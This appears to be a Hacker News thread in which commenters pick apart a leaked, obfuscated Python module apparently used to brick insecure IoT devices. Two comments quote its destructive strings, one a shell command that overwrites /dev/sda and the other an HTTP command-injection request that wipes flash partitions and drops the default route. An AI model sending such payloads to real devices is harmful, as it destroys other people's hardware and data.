> You can download the module which executes the http and telnet-based payloads ...

pdkl95 · on Dec 17, 2017

just found this: https://github.com/JeremyNGalloway/mod_plaintext.py

edit: I would recommend extreme caution with that file. I'm still reading, but strings like this are worrying:

    'busybox cat /dev/urandom >/dev/sda &'

catfood · on Dec 17, 2017

Check this one out:

'GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=(cat%20/dev/urandom%20%3e/dev/mtdblock3%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock4%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock6%20%26);(cat%20/dev/urandom%20%3e/dev/sda2%20%26);((sleep%2017;route%20del%20default)%20%26) HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\n\r\n'

Operyl · on Dec 17, 2017

Holy obfuscated Python, that's quite the jumbled mess. This is going to be a fun one to pick apart.

I don't think the string is .. worrying on its own given that, you know, this thing is meant to kill IOT/etc devices that are insecure. I'd argue that just given the source (the internet) is enough reason to be wary.

laretluval · on Dec 17, 2017

Fascinating.

What's up with all the stuff like "if 81 - 81: ..."? Won't that just evaluate to false and never run?

marten-de-vries · on Dec 17, 2017

Exactly. It's there to (very mildly) confuse you.

sattoshi · on Dec 17, 2017

perhaps that's how vulnerable devices were bricked?

AlexCoventry · on Dec 17, 2017

Thanks.

alkyl · on Dec 17, 2017

https://archive.fo/RTVpt